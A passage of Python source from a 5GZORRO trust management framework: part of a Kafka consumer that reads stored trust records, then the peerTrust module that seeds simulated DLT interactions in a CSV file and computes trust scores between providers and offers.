if trust_information["trustor"]["trustorDID"] in historical:
historical[trust_information["trustor"]["trustorDID"]].append(trust_information)
else:
historical[trust_information["trustor"]["trustorDID"]] = [trust_information]
data_lock.release()
logging.info("New message: %s", trust_information)
def readSLANotification(self, historical, trustor, trustee, offerDID):
""" This function retrieves all notifications of potential SLA violations generated by the SLA Breach Predictor.
Currently, we are simulating that the TMF is subscribed to the real SLA Breach Predicto Kafka topic.
TODO -> Verify which trustor (5GZORRO Participant) the notification is associated with as the Trust Framework may be
managing the trust of more than one at the same time. if message.key.decode('utf-8') =="""
global consumer
notifications = []
for message in consumer:
sla_information = json.loads(message.value.decode())
notifications.append(sla_information)
return notifications
def readLastTrustValues(self, historical, trustor, trustee, last_interaction, current_interation_number):
""" This method is utilised to retrieve all new trust information generated by a particular trustee on which we want
to update our previous trust score. This method only retrieves new inputs """
values = []
""" Starting from the end to discover new trust information faster """
for interactions in reversed(historical):
interation_number = interactions["currentInteractionNumber"]
""" Looking for all new interactions not previously contemplated"""
if interactions["trustor"]["trustorDID"] == trustor and \
interactions["trustor"]["trusteeDID"] == trustee and \
int(interation_number) > int(last_interaction) and \
int(interation_number) == int(current_interation_number):
data = {"trustorDID": interactions["trustor"]["trustorDID"],
"trusteeDID": interactions["trustor"]["trusteeDID"],
"offerDID": interactions["trustor"]["offerDID"],
"trusteeSatisfaction": interactions["trustee"]["trusteeSatisfaction"],
"credibility": interactions["trustor"]["credibility"],
"transactionFactor": interactions["trustor"]["transactionFactor"],
"communityFactor": interactions["trustor"]["communityFactor"],
"interaction_number": interactions["trustor"]["direct_parameters"]["interactionNumber"],
"totalInteractionNumber": interactions["trustor"]["direct_parameters"]["totalInteractionNumber"],
"userSatisfaction": interactions["trustor"]["direct_parameters"]["userSatisfaction"],
"trust_value": interactions["trust_value"],
"initEvaluationPeriod": interactions["initEvaluationPeriod"],
"endEvaluationPeriod": interactions["endEvaluationPeriod"]
}
values.append(data)
return values
def readLastTrustInterationValues(self, historical, trustor, trustee, offer, current_interation_number):
""" This method is utilised to retrieve all new trust information generated by a particular trustee on the current
interaction number X """
data = {}
for interactions in reversed(historical):
if interactions["trustor"]["trustorDID"] == trustor and \
interactions["trustor"]["trusteeDID"] == trustee and \
interactions["trustor"]["offerDID"] == offer and \
current_interation_number > 0:
interation_number = interactions["trustor"]["direct_parameters"]["interactionNumber"]
""" Checking whether the current interaction is the one we are looking for"""
if interation_number == current_interation_number-1:
data = {"trustorDID": interactions["trustor"]["trustorDID"],
"trusteeDID": interactions["trustor"]["trusteeDID"],
"offerDID": interactions["trustor"]["offerDID"],
"trusteeSatisfaction": interactions["trustee"]["trusteeSatisfaction"],
"credibility": interactions["trustor"]["credibility"],
"transactionFactor": interactions["trustor"]["transactionFactor"],
"communityFactor": interactions["trustor"]["communityFactor"],
"interaction_number": interactions["trustor"]["direct_parameters"]["interactionNumber"],
"totalInteractionNumber": interactions["trustor"]["direct_parameters"]["totalInteractionNumber"],
"userSatisfaction": interactions["trustor"]["direct_parameters"]["userSatisfaction"],
"trust_value": interactions["trust_value"],
"initEvaluationPeriod": interactions["initEvaluationPeriod"],
"endEvaluationPeriod": interactions["endEvaluationPeriod"]
}
return data
return data
def readLastTrustValue(self, historical, trustor, trustee):
""" This method obtains the last trust value recorded in the historical for a specific a trustor, and trustee.
Only specific information is returned """
data = {}
for interactions in reversed(historical):
if interactions["trustor"]["trustorDID"] == trustor and \
interactions["trustor"]["trusteeDID"] == trustee:
data = {"trustorDID": interactions["trustor"]["trustorDID"],
"trusteeDID": interactions["trustor"]["trusteeDID"],
"offerDID": interactions["trustor"]["offerDID"],
"trusteeSatisfaction": interactions["trustee"]["trusteeSatisfaction"],
"credibility": interactions["trustor"]["credibility"],
"transactionFactor": interactions["trustor"]["transactionFactor"],
"communityFactor": interactions["trustor"]["communityFactor"],
"interaction_number": interactions["trustor"]["direct_parameters"]["interactionNumber"],
"totalInteractionNumber": interactions["trustor"]["direct_parameters"]["totalInteractionNumber"],
"userSatisfaction": interactions["trustor"]["direct_parameters"]["userSatisfaction"],
"trust_value": interactions["trust_value"],
"initEvaluationPeriod": interactions["initEvaluationPeriod"],
"endEvaluationPeriod": interactions["endEvaluationPeriod"]
}
return data
return data
def readLastTrustValueOffer(self, historical, trustor, trustee, offer):
""" This method obtains the last trust value recorded in the historical for a specific a trustor, trustee and offer.
Only specific information is returned """
data = {}
for interactions in reversed(historical):
if interactions["trustor"]["trustorDID"] == trustor and \
interactions["trustor"]["trusteeDID"] == trustee and \
interactions["trustor"]["offerDID"] == offer:
data = {"trustorDID": interactions["trustor"]["trustorDID"],
"trusteeDID": interactions["trustor"]["trusteeDID"],
"offerDID": interactions["trustor"]["offerDID"],
"trusteeSatisfaction": interactions["trustee"]["trusteeSatisfaction"],
"credibility": interactions["trustor"]["credibility"],
"transactionFactor": interactions["trustor"]["transactionFactor"],
"communityFactor": interactions["trustor"]["communityFactor"],
"interaction_number": interactions["trustor"]["direct_parameters"]["interactionNumber"],
"totalInteractionNumber": interactions["trustor"]["direct_parameters"]["totalInteractionNumber"],
"userSatisfaction": interactions["trustor"]["direct_parameters"]["userSatisfaction"],
"trust_value": interactions["trust_value"],
"initEvaluationPeriod": interactions["initEvaluationPeriod"],
"endEvaluationPeriod": interactions["endEvaluationPeriod"]
}
return data
return data
def readAllInformationTrustValue(self, historical, trustor, trustee, offer):
""" This method obtains the last trust value recorded in Kafka for a specific a trustor, trustee and offer. All
previously recorded trust information is returned """
data = {}
for interactions in reversed(historical):
if interactions["trustor"]["trustorDID"] == trustor and \
interactions["trustor"]["trusteeDID"] == trustee and \
interactions["trustor"]["offerDID"] == offer:
data = {"trustorDID": interactions["trustor"]["trustorDID"],
"trusteeDID": interactions["trustor"]["trusteeDID"],
"offerDID": interactions["trustor"]["offerDID"],
"trusteeSatisfaction": interactions["trustee"]["trusteeSatisfaction"],
"credibility": interactions["trustor"]["credibility"],
"transactionFactor": interactions["trustor"]["transactionFactor"],
"communityFactor": interactions["trustor"]["communityFactor"],
"interaction_number": interactions["trustor"]["direct_parameters"]["interactionNumber"],
"totalInteractionNumber": interactions["trustor"]["direct_parameters"]["totalInteractionNumber"],
"userSatisfaction": interactions["trustor"]["direct_parameters"]["userSatisfaction"],
"trust_value": interactions["trust_value"],
"initEvaluationPeriod": interactions["initEvaluationPeriod"],
"endEvaluationPeriod": interactions["endEvaluationPeriod"]
}
return data
return data
def readTrusteeInteractions(self, historical, trustee):
""" This function counts all interactions with a particular trustee in the historical"""
counter = 0
for interactions in reversed(historical):
if interactions["trustor"]["trusteeDID"] == trustee:
counter += 1
return counter
def readOfferTrusteeInteractions(self, historical, trustee, offerTrusteDIDs):
""" This function counts all interactions with a particular offer in the historical """
counter = 0
for interactions in reversed(historical):
if interactions["trustor"]["trusteeDID"] == trustee and \
interactions["trustor"]["offerDID"] == offerTrusteDIDs:
counter += 1
return counter
def readSatisfactionSummation(self, historical, trustor, trustee):
""" This method returns the satisfaction average rate between a trustor and a trustee """
counter = 0
satisfactionsummation = 0.0
iterations = 0
for interactions in reversed(historical):
iterations+=1
if interactions["trustor"]["trustorDID"] == trustor and \
interactions["trustor"]["trusteeDID"] == trustee:
counter += 1
satisfactionsummation = satisfactionsummation + interactions["trustor"]["direct_parameters"]["userSatisfaction"]
return round(satisfactionsummation/counter, 3)
```
#### File: Trust-management-framework/peer_Trust_Model/peerTrust.py
```python
import json
import sys
import logging
import random
import time
import ast
import math
import os.path
import csv
import rstr
import copy
#from producer import *
from trustInformationTemplate import *
from consumer import *
from datetime import datetime
from random import randint
from multiprocessing import Process, Value, Manager
from threading import Lock
#logging.basicConfig(level=logging.INFO)
""" This file contains all methods necessary to obtain the minimum information required by the peerTrust model """
class PeerTrust():
dlt_file_name = 'DLT.csv'
dlt_headers = ["trustorDID","trusteeDID", "offerDID", "userSatisfaction", "interactionNumber",
"totalInteractionNumber", "currentInteractionNumber"]
""" Creating additional domains to generate previous interactions and avoid a cold start """
list_additional_did_providers = []
list_additional_did_offers = []
""" Parameters to define a minimum interactions in the system and avoid a cold start"""
max_previous_providers_DLT = 4
max_previous_providers_interactions_DLT = 3
max_previous_interactions_DLT = max_previous_providers_DLT * max_previous_providers_interactions_DLT
max_different_interactions = max_previous_providers_DLT * 2
historical = []
consumer = None
def find_by_column(self, filename, column, value):
""" This method discovers interactions registered in the DLT looking at one specific value"""
list_object = []
with open(filename) as f:
reader = csv.DictReader(f)
for item in reader:
if item[column] == value:
list_object.append(item)
return list(list_object)
def find_by_two_column(self, filename, column1, value1, colum2, value2):
""" This method discovers interactions registered in the DLT looking at two specific values"""
list_object = []
with open(filename) as f:
reader = csv.DictReader(f)
for item in reader:
if item[column1] == value1 and item[colum2] == value2:
list_object.append(item)
return list(list_object)
def minimumTrustTemplate(self, trustorDID, trusteeDID, offerDID):
""" This method initialises a set of minimum trust parameters to ensure that the system does not start from
scratch as well as defining a common trust template which will then be updated """
trustInformationTemplate = TrustInformationTemplate()
information = trustInformationTemplate.trustTemplate()
""" Adding information related to the specific request """
information["trustee"]["trusteeDID"] = trusteeDID
information["trustee"]["offerDID"] = offerDID
#information["trustee"]["trusteeSatisfaction"] = self.getTrusteeSatisfactionDLT(trusteeDID)
information["trustee"]["trusteeSatisfaction"] = round(random.uniform(0.8, 0.95),3)
information["trustor"]["trustorDID"] = trustorDID
information["trustor"]["trusteeDID"] = trusteeDID
information["trustor"]["offerDID"] = offerDID
information["trustor"]["credibility"] = round(random.uniform(0.75, 0.9),3)
information["trustor"]["transactionFactor"] = round(random.uniform(0.8, 0.9),3)
information["trustor"]["communityFactor"] = round(random.uniform(0.85, 0.9),3)
information["trustor"]["direct_parameters"]["userSatisfaction"] = round(random.uniform(0.75, 0.9),3)
direct_weighting = round(random.uniform(0.6, 0.7),2)
information["trustor"]["direct_parameters"]["direct_weighting"] = direct_weighting
information["trustor"]["indirect_parameters"]["recommendation_weighting"] = 1-direct_weighting
information["trustor"]["direct_parameters"]["interactionNumber"] = self.getInteractionNumber(trustorDID, trusteeDID)
information["trustor"]["direct_parameters"]["totalInteractionNumber"] = self.getLastTotalInteractionNumber(trusteeDID)
information["trust_value"] = round(information["trustor"]["direct_parameters"]["direct_weighting"]*(information["trustee"]["trusteeSatisfaction"]*information["trustor"]["credibility"]*information["trustor"]["transactionFactor"])+information["trustor"]["indirect_parameters"]["recommendation_weighting"]*information["trustor"]["communityFactor"],3)
information["currentInteractionNumber"] = self.getCurrentInteractionNumber(trustorDID)
information["initEvaluationPeriod"] = datetime.timestamp(datetime.now())-1000
information["endEvaluationPeriod"] = datetime.timestamp(datetime.now())
return information
def minimumTrustValuesDLT(self, producer, trustor, dict_product_offers):
""" This method establishes multiple trust relationships from list of product offers to start the trust
model with a set of minimum relationships. In addition, it also simulates the registration of such interactions
in the DLT """
print("\n\nSet of previous trust interactions between 5GZORRO domains\n")
data = []
""" 4 extra domains are currently considered"""
for i in range(4):
self.list_additional_did_providers.append(rstr.xeger("[a-z0-9]{8}-[a-z0-9]{4}-[a-z0-9]{4}-[a-z0-9]{4}-[a-z0-9]{12}"))
additional_did_offers = []
additional_did_offers.append(rstr.xeger("[a-z0-9]{8}-[a-z0-9]{4}-[a-z0-9]{4}-[a-z0-9]{4}-[a-z0-9]{12}"))
additional_did_offers.append(rstr.xeger("[a-z0-9]{8}-[a-z0-9]{4}-[a-z0-9]{4}-[a-z0-9]{4}-[a-z0-9]{12}"))
self.list_additional_did_offers.append(additional_did_offers)
aux_did_providers = self.list_additional_did_providers[:]
aux_did_offers = copy.deepcopy(self.list_additional_did_offers)
""" Generating two interactions per provider, one per each offer"""
counter = 0
for i in range(self.max_previous_providers_DLT):
providers = list(range(0,self.max_previous_providers_DLT))
providers.remove(i)
current_additional_provider = random.choice(providers)
current_additional_offer = randint(0,1)
for j in range (self.max_previous_providers_interactions_DLT):
interaction = False
new_trustee = None
new_offer = None
while (interaction == False):
if "$" not in aux_did_providers[current_additional_provider] and \
self.list_additional_did_providers[i] != aux_did_providers[current_additional_provider]:
if "$" not in aux_did_offers[current_additional_provider][current_additional_offer]:
new_trustee = aux_did_providers[current_additional_provider]
new_offer = aux_did_offers[current_additional_provider][current_additional_offer]
counter+=1
interaction = True
aux_did_offers[current_additional_provider][current_additional_offer] = \
aux_did_offers[current_additional_provider][current_additional_offer] + "$"
else:
current_additional_offer = (current_additional_offer+1)\
%len(aux_did_offers[current_additional_provider])
if "$" not in aux_did_offers[current_additional_provider][current_additional_offer] and \
self.list_additional_did_providers[i] != aux_did_providers[current_additional_provider]:
new_trustee = aux_did_providers[current_additional_provider]
new_offer = aux_did_offers[current_additional_provider][current_additional_offer]
counter+=1
interaction = True
aux_did_offers[current_additional_provider][current_additional_offer] = \
aux_did_offers[current_additional_provider][current_additional_offer] + "$"
else:
aux_did_providers[current_additional_provider] = \
aux_did_providers[current_additional_provider] + "$"
current_additional_provider = (current_additional_provider+1)%len(aux_did_providers)
else:
current_additional_provider = (current_additional_provider+1)%len(aux_did_providers)
if counter >= self.max_different_interactions-1 and \
self.list_additional_did_providers[i] != self.list_additional_did_providers[current_additional_provider]:
new_trustee = aux_did_providers[current_additional_provider]
new_offer = aux_did_offers[current_additional_provider][current_additional_offer]
if "$" in new_trustee:
new_trustee = self.list_additional_did_providers[current_additional_provider]
else:
aux_did_providers[current_additional_provider] = aux_did_providers[current_additional_provider] + "$"
if "$" in new_offer:
new_offer = self.list_additional_did_offers[current_additional_provider][current_additional_offer]
else:
aux_did_offers[current_additional_provider][current_additional_offer] = \
aux_did_offers[current_additional_provider][current_additional_offer] + "$"
counter+=1
interaction = True
new_interaction = {"trustorDID": self.list_additional_did_providers[i], "trusteeDID": new_trustee,
"offerDID": new_offer, "userSatisfaction": round(random.uniform(0.80, 0.99), 3),
"interactionNumber": 1, "totalInteractionNumber": 6, "currentInteractionNumber": 8}
""" Adjusting the parameters based on previous interactions """
for interaction in data:
if interaction["trustorDID"] == new_interaction["trustorDID"]:
new_interaction["currentInteractionNumber"] = interaction["currentInteractionNumber"] + 1
if interaction["trustorDID"] == new_interaction["trustorDID"] and interaction["trusteeDID"] == new_interaction["trusteeDID"] and interaction["offerDID"] == new_interaction["offerDID"]:
new_interaction["interactionNumber"] == interaction["interactionNumber"] + 1
if interaction["trustorDID"] == new_interaction["trusteeDID"]:
new_interaction["currentInteractionNumber"] = interaction["totalInteractionNumber"] + 1
if interaction["trusteeDID"] == new_interaction["trustorDID"]:
new_interaction["totalInteractionNumber"] = interaction["currentInteractionNumber"]
if interaction["trusteeDID"] == new_interaction["trusteeDID"]:
new_interaction["totalInteractionNumber"] = interaction["totalInteractionNumber"]
data.append(new_interaction)
""" Adding new interactions with respect to the product offers sent by the SRSD request"""
aux_new_interactions = []
trustor_acquired = False
for trustee in dict_product_offers:
""" Ignore the first item related to the trustor DID """
if trustor_acquired == False:
next(iter(dict_product_offers.values()))
trustor_acquired = True
else:
for offer in dict_product_offers[trustee]:
new_interaction = {"trustorDID": "did:5gzorro:domain-Z", "trusteeDID": trustee, "offerDID": offer,
"userSatisfaction": round(random.uniform(0.80, 0.99), 3), "interactionNumber": 1, "totalInteractionNumber": 6, "currentInteractionNumber": 8}
aux_new_interactions.append(new_interaction)
""" Adjusting the parameters based on previous interactions"""
for i in range(len(aux_new_interactions)):
index = i%len(self.list_additional_did_providers)
aux_new_interactions[i]["trustorDID"] = self.list_additional_did_providers[index]
for interaction in data:
if interaction["trustorDID"] == aux_new_interactions[i]["trustorDID"]:
aux_new_interactions[i]["currentInteractionNumber"] = interaction["currentInteractionNumber"] + 1
if interaction["trustorDID"] == aux_new_interactions[i]["trustorDID"] and interaction["trusteeDID"] == aux_new_interactions[i]["trusteeDID"] and interaction["offerDID"] == aux_new_interactions[i]["offerDID"]:
aux_new_interactions[i]["interactionNumber"] == interaction["interactionNumber"] + 1
if interaction["trustorDID"] == aux_new_interactions[i]["trusteeDID"]:
aux_new_interactions[i]["currentInteractionNumber"] = interaction["totalInteractionNumber"] + 1
if interaction["trusteeDID"] == aux_new_interactions[i]["trustorDID"]:
aux_new_interactions[i]["totalInteractionNumber"] = interaction["currentInteractionNumber"]
if interaction["trusteeDID"] == aux_new_interactions[i]["trusteeDID"]:
aux_new_interactions[i]["totalInteractionNumber"] = interaction["totalInteractionNumber"]
data.append(aux_new_interactions[i])
print(data, "\n")
interactions = []
"If DLT.csv file doesn't exist, we add new interactions related to the POs and minimum interactions between providers"
if not os.path.exists(self.dlt_file_name):
if not os.path.exists(self.dlt_file_name):
with open(self.dlt_file_name, 'w', encoding='UTF8', newline='') as dlt_data:
writer = csv.DictWriter(dlt_data, fieldnames=self.dlt_headers)
writer.writeheader()
for interaction in data:
trust_informartion = self.minimumTrustTemplate(interaction["trustorDID"], interaction["trusteeDID"], interaction["offerDID"])
trust_informartion["trustor"]["direct_parameters"]["userSatisfaction"] = interaction["userSatisfaction"]
trust_informartion["trustor"]["direct_parameters"]["interactionNumber"] = interaction["interactionNumber"]
trust_informartion["trustor"]["direct_parameters"]["totalInteractionNumber"] = interaction["totalInteractionNumber"]
trust_informartion["currentInteractionNumber"] = interaction["currentInteractionNumber"]
""" The minimum interactions are also registered in the Trustor's historical but
they must be deleted when cold start is not used """
interactions.append(trust_informartion)
for i in interactions:
self.historical.append(i)
return data
else:
"We only add new interactions related to the POs"
for interaction in aux_new_interactions:
trust_informartion = self.minimumTrustTemplate(interaction["trustorDID"], interaction["trusteeDID"], interaction["offerDID"])
trust_informartion["trustor"]["direct_parameters"]["userSatisfaction"] = interaction["userSatisfaction"]
trust_informartion["trustor"]["direct_parameters"]["interactionNumber"] = interaction["interactionNumber"]
trust_informartion["trustor"]["direct_parameters"]["totalInteractionNumber"] = interaction["totalInteractionNumber"]
trust_informartion["currentInteractionNumber"] = interaction["currentInteractionNumber"]
""" The minimum interactions are also registered in the Trustor's historical but
they must be deleted when cold start is not used """
interactions.append(trust_informartion)
for i in interactions:
self.historical.append(i)
return aux_new_interactions
#return data
def stringToDictionaryList(self):
"""Convert string to a list of dictionaries"""
new_interaction_list = []
with open('DLT.json', 'r') as file:
file.seek(0)
interaction_list = file.read()
interaction_list = interaction_list.split("\\n")
for interaction in interaction_list:
interaction = interaction.replace("\\\"","\"")
interaction = interaction.replace("\"{", "{")
interaction = interaction.replace("}\"", "}")
new_interaction_list.append(ast.literal_eval(interaction))
file.close()
return new_interaction_list
def getLastTotalInteractionNumber(self, trusteeDID):
""" Retrieve the last interactions number registered in the DLT for a Trustee"""
last_total_iteraction_number = 1
with open(self.dlt_file_name) as f:
reader = csv.DictReader(f)
for item in reader:
if item["trustorDID"] == trusteeDID and int(item["currentInteractionNumber"]) > last_total_iteraction_number:
last_total_iteraction_number = int(item["currentInteractionNumber"])
elif item["trusteeDID"] == trusteeDID and int(item["totalInteractionNumber"]) > last_total_iteraction_number:
last_total_iteraction_number = int(item["totalInteractionNumber"])
return last_total_iteraction_number
def getCurrentInteractionNumber(self, trustorDID):
""" This method returns the next interaction number for a trustor """
current_iteraction_number = 0
with open(self.dlt_file_name) as f:
reader = csv.DictReader(f)
for item in reader:
if item["trustorDID"] == trustorDID and int(item["currentInteractionNumber"]) > current_iteraction_number:
current_iteraction_number = int(item["currentInteractionNumber"])
elif item["trusteeDID"] == trustorDID and int(item["totalInteractionNumber"]) > current_iteraction_number:
current_iteraction_number = int(item["totalInteractionNumber"])
return current_iteraction_number+1
def getInteractionNumber(self, trustorDID, trusteeDID):
""" This method retrieves the number of interactions between two entities and adds one more interaction """
iteraction_number = 0
list_interactions = self.find_by_column(self.dlt_file_name, 'trustorDID', trustorDID)
for interaction in list_interactions:
if interaction["trusteeDID"] == trusteeDID and int(interaction["interactionNumber"]) > iteraction_number:
iteraction_number = int(interaction["interactionNumber"])
return iteraction_number+1
def getRecommenderDLT(self, trustorDID, trusteeDID):
""" This method recovers a recommender, who is reliable for us, that has recently interacted with a trustee.
Return the last interaction in order to request the last trust value. In this case, reliable means
other trustees with whom we have previously interacted with """
last_interaction = {}
last_registered_interaction = True
with open(self.dlt_file_name) as f:
reader = csv.DictReader(f)
""" Starting from the end to identify the last recommender"""
for interaction in reversed(list(reader)):
""" Check that the last recommender is not ourselves"""
if interaction['trustorDID'] != trustorDID and interaction['trusteeDID'] == trusteeDID:
""" Store the most recent interaction with the Trustee to return it in the case of no trustworthy
recommenders can be found"""
if last_registered_interaction:
last_interaction = interaction
last_registered_interaction = False
"""Check if the Trustor is reliable for us"""
for trustworthy_candidate in reversed(list(reader)):
if trustworthy_candidate['trustorDID'] == trustorDID and trustworthy_candidate['trusteeDID'] == interaction['trustorDID']:
return dict(interaction)
return dict(last_interaction)
def getRecommenderOfferDLT(self, trustorDID, trusteeDID, offerDID):
""" This method recovers an offer associated with a recommender, who is reliable for us, that has recently
interacted with a trustee. Return the last interaction in order to request the last trust value.
In this case, reliable means other trustees with whom we have previously interacted with"""
last_interaction = {}
last_registered_interaction = True
with open(self.dlt_file_name) as f:
reader = csv.DictReader(f)
""" Starting from the end to identify the last recommender"""
for interaction in reversed(list(reader)):
""" Check that the last recommender is not ourselves"""
if interaction['trustorDID'] != trustorDID and interaction['trusteeDID'] == trusteeDID and interaction['offerDID'] == offerDID:
""" Store the most recent interaction with the Trustee """
if last_registered_interaction:
last_interaction = interaction
last_registered_interaction = False
""" Check if the Trustor is reliable for us """
for trustworthy_candidate in reversed(list(reader)):
if trustworthy_candidate['trustorDID'] == trustorDID and trustworthy_candidate['trusteeDID'] == interaction['trustorDID'] and trustworthy_candidate['offerDID'] == offerDID:
return dict(interaction)
return dict(last_interaction)
def getLastRecommendationValue(self, last_interaction):
""" This methods goes to a recommender kafka channel to request a trust score """
global consumer
last_truste_value = 0.0
trustor = last_interaction['trustorDID']
trustee = last_interaction['trusteeDID']
trust_information = self.consumer.readLastTrustValue(self.historical, trustor, trustee)
last_truste_value = trust_information["trust_value"]
return last_truste_value
def getLastOfferRecommendationValue(self, last_interaction):
""" This methods goes to an offer recommender kafka channel to request a trust score """
global consumer
last_truste_value = 0.0
trustor = last_interaction['trustorDID']
trustee = last_interaction['trusteeDID']
offer = last_interaction['offerDID']
trust_information = self.consumer.readLastTrustValueOffer(self.historical, trustor, trustee, offer)
last_truste_value = trust_information["trust_value"]
return last_truste_value
def getTrusteeSatisfactionDLT(self, trusteeDID):
""" This method collects the userSatisfaction from the DLT when a trustor contemplates a feedback. However,
this information should be deleted from the DLT and requested directly to other 5G-TRMFs """
counter = 0
general_satisfaction = 0.0
last_interaction = self.find_by_column(self.dlt_file_name, 'trustorDID', trusteeDID)
for interaction in last_interaction:
general_satisfaction = general_satisfaction + float(interaction['userSatisfaction'])
counter = counter + 1
return round(general_satisfaction/counter, 3)
def generateHistoryTrustInformation(self, producer, consumer_instance, trustorDID, trusteeDID, offerDID, previous_interaction_number):
""" This method generates trust information that will be sent to trustor Kafka Topic. In particular,
it is adding _n_ previous interactions (history) to be contemplated in future assessments"""
list_interactions = []
global consumer
self.consumer = consumer_instance
if previous_interaction_number != 0:
trustInformationTemplate = TrustInformationTemplate()
information = trustInformationTemplate.trustTemplate()
""" Adding information related to the specific request """
information["trustee"]["trusteeDID"] = trusteeDID
information["trustee"]["offerDID"] = offerDID
information["trustee"]["trusteeSatisfaction"] = round(random.uniform(0.8, 0.95), 3)
information["trustor"]["trustorDID"] = trustorDID
information["trustor"]["trusteeDID"] = trusteeDID
information["trustor"]["offerDID"] = offerDID
information["trustor"]["credibility"] = 0.913
information["trustor"]["transactionFactor"] = 0.856
information["trustor"]["communityFactor"] = 0.865
information["trustor"]["direct_parameters"]["userSatisfaction"] = round(random.uniform(0.8, 0.95),3)
direct_weighting = round(random.uniform(0.6, 0.7),2)
information["trustor"]["direct_parameters"]["direct_weighting"] = direct_weighting
information["trustor"]["indirect_parameters"]["recommendation_weighting"] = 1-direct_weighting
information["trustor"]["direct_parameters"]["interactionNumber"] = self.getInteractionNumber(trustorDID, trusteeDID)
information["trustor"]["direct_parameters"]["totalInteractionNumber"] = self.getLastTotalInteractionNumber(trusteeDID)
information["trust_value"] = round(information["trustor"]["direct_parameters"]["direct_weighting"]*(information["trustee"]["trusteeSatisfaction"]*information["trustor"]["credibility"]*information["trustor"]["transactionFactor"])+information["trustor"]["indirect_parameters"]["recommendation_weighting"]*information["trustor"]["communityFactor"],3)
information["currentInteractionNumber"] = self.getCurrentInteractionNumber(trustorDID)
information["initEvaluationPeriod"] = datetime.timestamp(datetime.now())-1000
information["endEvaluationPeriod"] = datetime.timestamp(datetime.now())
if information not in self.historical:
self.historical.append(information)
data = {"trustorDID": trustorDID, "trusteeDID": trusteeDID, "offerDID": offerDID,
"userSatisfaction": information["trustor"]["direct_parameters"]["userSatisfaction"],
"interactionNumber": information["trustor"]["direct_parameters"]["interactionNumber"],
"totalInteractionNumber": information["trustor"]["direct_parameters"]["totalInteractionNumber"],
"currentInteractionNumber": information["currentInteractionNumber"]}
with open(self.dlt_file_name, 'a', encoding='UTF8', newline='') as dlt_data:
writer = csv.DictWriter(dlt_data, fieldnames=self.dlt_headers)
writer.writerow(data)
for i in range(previous_interaction_number-1):
interaction_number = self.getInteractionNumber(trustorDID, trusteeDID)
trust_data = self.consumer.readLastTrustInterationValues(self.historical, trustorDID, trusteeDID, offerDID, interaction_number)
information["trustee"]["trusteeDID"] = trusteeDID
information["trustee"]["offerDID"] = offerDID
information["trustee"]["trusteeSatisfaction"] = round((round(random.uniform(0.8, 0.9),3) + trust_data["trusteeSatisfaction"])/2, 3)
#information["trustee"]["trusteeSatisfaction"] = round(random.uniform(0.8, 0.9), 3)
information["trustor"]["trustorDID"] = trustorDID
information["trustor"]["trusteeDID"] = trusteeDID
information["trustor"]["offerDID"] = offerDID
information["trustor"]["credibility"] = round((round(random.uniform(0.8, 0.9),3) + trust_data["credibility"])/2, 3)
information["trustor"]["transactionFactor"] = round((round(random.uniform(0.75, 0.95), 3) + trust_data["transactionFactor"])/2, 3)
information["trustor"]["communityFactor"] = round((round(random.uniform(0.75, 0.9), 3) + trust_data["communityFactor"])/2, 3)
information["trustor"]["direct_parameters"]["userSatisfaction"] = round(random.uniform(0.8, 0.9),3)
direct_weighting = round(random.uniform(0.6, 0.7),2)
information["trustor"]["direct_parameters"]["direct_weighting"] = direct_weighting
information["trustor"]["indirect_parameters"]["recommendation_weighting"] = 1-direct_weighting
information["trustor"]["direct_parameters"]["interactionNumber"] = interaction_number
information["trustor"]["direct_parameters"]["totalInteractionNumber"] = self.getLastTotalInteractionNumber(trusteeDID)
information["trust_value"] = round(information["trustor"]["direct_parameters"]["direct_weighting"]*(information["trustee"]["trusteeSatisfaction"]*information["trustor"]["credibility"]*information["trustor"]["transactionFactor"])+information["trustor"]["indirect_parameters"]["recommendation_weighting"]*information["trustor"]["communityFactor"],3)
information["currentInteractionNumber"] = self.getCurrentInteractionNumber(trustorDID)
information["initEvaluationPeriod"] = datetime.timestamp(datetime.now())-1000
information["endEvaluationPeriod"] = datetime.timestamp(datetime.now())
if information not in self.historical:
self.historical.append(information)
data = {"trustorDID": trustorDID, "trusteeDID": trusteeDID, "offerDID": offerDID,
"userSatisfaction": information["trustor"]["direct_parameters"]["userSatisfaction"],
"interactionNumber": information["trustor"]["direct_parameters"]["interactionNumber"],
"totalInteractionNumber": information["trustor"]["direct_parameters"]["totalInteractionNumber"],
"currentInteractionNumber": information["currentInteractionNumber"]}
with open(self.dlt_file_name, 'a', encoding='UTF8', newline='') as dlt_data:
writer = csv.DictWriter(dlt_data, fieldnames=self.dlt_headers)
writer.writerow(data)
return None
def generateTrusteeInformation(self, producer, consumer, trustorDID, availableAssets, totalAssets, availableAssetLocation, totalAssetLocation, managedViolations, predictedViolations, executedViolations, nonPredictedViolations, consideredOffers, totalOffers, consideredOfferLocation, totalOfferLocation, managedOfferViolations, predictedOfferViolations, executedOfferViolations, nonPredictedOfferViolations):
""" This method introduces Trustee information based on peerTrust equations and using the minimum
values previously established """
self.consumer = consumer
trustee_selection = random.randint(0,3)
offer_selection = random.randint(0,1)
if not bool(self.list_additional_did_providers):
"Adding the previous DID providers autogenerated to avoid the cold start"
self.list_additional_did_offers = [[]] * self.max_previous_providers_DLT
with open(self.dlt_file_name) as f:
reader = csv.DictReader(f)
pointer = 0
for item in reader:
if item["trustorDID"] not in self.list_additional_did_providers and pointer < self.max_previous_interactions_DLT:
self.list_additional_did_providers.append(item["trustorDID"])
pointer+=1
"Adding the previous DID offers autogenerated to avoid the cold start"
with open(self.dlt_file_name) as f:
reader = csv.DictReader(f)
for item in reader:
if item["trusteeDID"] in self.list_additional_did_providers and item["offerDID"] not in self.list_additional_did_offers:
self.list_additional_did_offers[self.list_additional_did_providers.index(item["trusteeDID"])].append(item["offerDID"])
trusteeDID = self.list_additional_did_providers[trustee_selection]
offerDID = self.list_additional_did_offers[trustee_selection][offer_selection]
information = self.minimumTrustTemplate(trustorDID, trusteeDID, offerDID)
print("\t* Provider ---> "+trusteeDID+" -- Product offer ---> "+offerDID)
information["trustor"]["credibility"] = self.credibility(trustorDID, trusteeDID)
information["trustor"]["transactionFactor"] = self.transactionContextFactor(trustorDID, trusteeDID, offerDID)
information["trustor"]["communityFactor"] = self.communityContextFactor(trustorDID, trusteeDID)
direct_weighting = round(random.uniform(0.6, 0.7),2)
information["trustor"]["direct_parameters"]["direct_weighting"] = direct_weighting
provider_reputation = self.providerReputation(availableAssets, totalAssets, availableAssetLocation, totalAssetLocation, managedViolations, predictedViolations, executedViolations, nonPredictedViolations)
provider_satisfaction = self.providerSatisfaction(trustorDID, trusteeDID, provider_reputation)
